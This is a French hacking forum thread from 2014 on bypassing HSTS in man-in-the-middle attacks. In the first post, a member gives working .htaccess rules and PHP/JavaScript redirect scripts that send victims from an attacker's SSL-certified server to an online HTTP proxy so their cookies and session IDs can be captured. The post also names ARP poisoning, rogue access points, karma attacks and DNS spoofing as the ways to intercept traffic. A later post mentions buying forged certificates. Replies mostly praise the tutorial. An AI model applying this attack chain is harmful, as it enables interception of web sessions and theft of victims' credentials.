Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-07-2014 15:56:48

FR3D3RIC
Membre
Inscription : 05-01-2014
Messages : 10

contournement HSTS pour MITM

Beaucoup d'entre nous se sont déjà retrouvé face au bon vieux "HTTP Strict Transport Security Failure' du navigateur lors de leurs attaques MITM big_smile.  J'ai donc un piti peu bossé là dessus  histoire d'éviter cet affreux message.
Les prérequis:
-Un serveur en ligne (avec une adresse IP assignée et un certificat SSL valide et certifié (OVH propose ça pour 49,99€ par an);
-un minimum de connaissances en Python, en PHP et en Javascript;
-un peu de temps.

Le principe de l'attaque

Rappelons tout d'abord ce qu'est  le HSTS:

HTTP Strict Transport Security (HSTS) est un mécanisme de politique de sécurité proposé pour HTTP, permettant à un serveur web de déclarer à un agent utilisateur (comme un navigateur web), compatible, qu'il doit interagir avec lui en utilisant une connexion sécurisée (comme HTTPS). La politique est donc communiquée à l'agent utilisateur par le serveur via la réponse HTTP, dans le champ d'en-tête nommé « Strict-Transport-Security ». La politique spécifie une période de temps durant laquelle l'agent utilisateur doit accéder au serveur uniquement de façon sécurisée. (Wikipédia.org)

Il nous faudra donc avoir un serveur web avec un certificat SSL qui n'affiche pas de messages d'erreur.
Pour cela, il nous faudra (malheureusement) environ 50€ par an. (Je vous conseille de jeter un coup d'oeil par ici). Ce sera notre "plateforme de cassage HTTPS" qui redirigera la victime vers un mandataire HTTP (proxy) en ligne codé en Python et PHP (Si vous n'avez pas encore appris ces langages ou que vous vez tout simplement un peu la flemme wink big_smile de vous lancer là dedans, vous pouvez cliquer ici. Je l'ai testé, il ne supporte pas une connexion HTTPS au serveur WEB en aval, ce qui rend impossible une connexion pour la victime à Gmail ou Facebook mais permet tout de même d'intercepter les informations intéressantes (cookies/ID)  ::CLIQUEZ ICI POUR VOIR LE RESULTAT::  mais il vaut mieux  le coder vous-même. Moi je suis en train de coder le mien mais il n'est pas encore finalisé. sad )

adR2kk.png

Mise en place:

Imaginons que c'est bon, vous avez votre serveur web avec SSL actif (on va le surnommer WEB1), et votre Mandataire HTTP en ligne (on va le surnommer WEB2).

Sur WEB1, il faudra modifier le .htaccess histoire de toujours tomber sur le index.php, qui contient le script de redirection qui nous intéresse:

RewriteEngine On
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

Toujours sur WEB1, créer un "index.php" et un "bridge.php" (l'un sera là pour définir la page que la victime tente d'ouvrir et l'autre pour les paramètres de redirection vers le proxy)
Voici des exemples de codes (je viens de les coder à l'arrache mais ça a l'air de fonctionner, ne me lynchez pas big_smile )
Index.php:

<script type="text/javascript">
var url = document.location;
document.location.href = "./bridge.php?url="+url;</script>

bridge.php:

 <script type="text/javascript">
document.location.href = "http://WEB2/<?php $str = $_GET["url"];
$str = preg_replace('#^https?://#', '', $str);
echo $str;?>";
</script>

Et pour WEB1 et WEB2, on est bon (je crois big_smile )

Maintenant, il suffit de se mettre en MITM avec un empoisonnement du cache ARP, un rogue AP, ou une attaque "hostapd_cli karma_enable" et de faire un DNSSPOOF en direction de WEB1, et ça roule (plus ou moins) ma poule !

Biensûr, il y a un tas (et pas un petit big_smile ) d'améliorations à faire, donc si vous avez des idées... :angel:

Chez moi le résultat est pas mal, je bosse encore sur la version HTTPS du proxy. Je la mettrais en ligne dès que possible.

FeR1e4.png

Happy Hunting !  lol tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-07-2014 19:02:02

Canardlaquay
N00b
Inscription : 20-04-2014
Messages : 1

Re : contournement HSTS pour MITM

Franchement bravo, j'ai recherché pas mal sur le sujet sans résultat, et voilà un bon tuto smile

Sinon pour le certificat, il en existe des beaucoup moins cher, mais je ne m'y connais vraiment pas sur le sujet, donc je laisse la parole aux autres !

Hors Ligne

#3 03-08-2014 21:29:52

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 362

Re : contournement HSTS pour MITM

Merci pour le tuto, sympa! Et oui, c'est fini le bon vieux temps ou il suffisait d'utiliser SSLStrip, maintenant les navigateurs ont évolué wink

Hors Ligne

#4 05-08-2014 19:49:35

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : contournement HSTS pour MITM

Canardlaquay a écrit :

Sinon pour le certificat, il en existe des beaucoup moins cher, mais je ne m'y connais vraiment pas sur le sujet, donc je laisse la parole aux autres !

Idem,mais tu peux te faire une idée en testant en local déja : securiser_apache2_avec_ssl mais bon c'est d'un tout autre niveau en dessous de notre ami FR3D3RIC...

doc.ubuntu-fr.org a écrit :

Un certificat permet de fournir diverses informations concernant l'identité de son détenteur (la personne qui publie les données). Ce certificat s'accompagne d'une clé publique qui est indispensable pour que la communication entre les machines soit chiffrée.

De même, afin de garantir l'authenticité du certificat, ce dernier est signé numériquement par le biais d'une clé privée provenant soit d'un organisme officiel (Société spécialisée dans la certification) soit par le détenteur du Certificat lui même. Dans ce dernier cas, on parlera de certificat auto-signé.

Dans la plupart des cas, l'obtention d'un Certificat certifié par une autorité officielle ayant un prix assez élevé, les webmasters auront tendance a vouloir signer eux-même leur certificat. Ce faisant, il est à noter que dans ce cas, le certificat ne sera pas reconnu par les navigateurs web comme étant certifié.


« γνωθι σεαυτον »

Hors Ligne

#5 05-08-2014 20:01:42

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : contournement HSTS pour MITM

J’espère qu'antares145 passera par ici car il connait très bien ce sujet.

Hors Ligne

#6 05-08-2014 21:23:33

FR3D3RIC
Membre
Inscription : 05-01-2014
Messages : 10

Re : contournement HSTS pour MITM

Je précise qu'il existe la technique aussi infaillible qu'illégale d'utiliser un certificat SSL falsifié (ca se marchande à prix d'or: 0.2 Bitcoins !) .

Hors Ligne

#7 06-08-2014 13:22:56

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : contournement HSTS pour MITM

Fuji a écrit :

J’espère qu'antares145 passera par ici

Moi aussi smile

Hors Ligne

#8 06-12-2014 23:34:07

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : contournement HSTS pour MITM

Tiens, j'étais passé à côté de celui-là ! smile

Intéressant, très intéressant même. A peaufiner un peu pour le rendre robuste, mais j'aime bien l'approche ! Je me suis permis d'ajouter un lien vers ce tuto dans mon article de l'époque (shameless plug !).

A noter que pour le "problème" de certificat signé, il y aura bientôt (au moins) un fournisseur gratuit --> Let Encrypt, une autorité de certification gratuite pour chiffrer le Web

Si ton code évolue, ça m'intéresse de voir ce que ça peut donner ! wink

Hors Ligne

#9 07-12-2014 23:07:16

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 362

Re : contournement HSTS pour MITM

Sinon niveau certificat gratuit je ne sais pas si quelqu'un a déja testé StartCom Free SSL?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]